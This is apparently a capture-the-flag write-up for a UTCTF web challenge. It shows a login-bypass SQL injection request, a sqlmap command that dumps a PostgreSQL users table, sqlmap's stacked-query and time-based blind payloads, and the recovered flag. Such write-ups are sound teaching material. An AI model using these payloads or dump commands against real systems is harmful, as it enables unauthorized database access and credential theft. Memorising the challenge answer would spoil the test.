Epic Admin Pwn
[Web]
epic admin pwn
this challenge is epic i promise
Recon
Blind SQLi on login form;
POST / HTTP/1.1
Host: web2.utctf.live:5006
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
username=admin&pass=admin' or 1=1--+
SQLmap
Laziness strikes yet again;
$ python sqlmap.py \
--dbms="postgresql" \
--hex \
--random-agent \
--url "http://web2.utctf.live:5006/" \
--time-sec 2 \
--data="username=admin&pass=admin*" \
-D public -T users -C "password" --dump
[05:18:38] [INFO] target URL appears to be UNION injectable with 3 columns
[...]
---
Parameter: #1* ((custom) POST)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: username=admin&pass=admin';SELECT PG_SLEEP(2)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=admin&pass=admin' AND 3913=(SELECT 3913 FROM PG_SLEEP(2)) AND 'waeR'='waeR
---
[05:40:25] [INFO] fetching number of column(s) 'password' entries for table 'users' in database 'public'
[05:25:54] [INFO] retrieved: 1
[...]
Database: public
Table: users
[1 entry]
+--------------------------+
| password |
+--------------------------+
| utflag{dual1pa1sp3rf3ct} |
+--------------------------+
Flag
utflag{dual1pa1sp3rf3ct}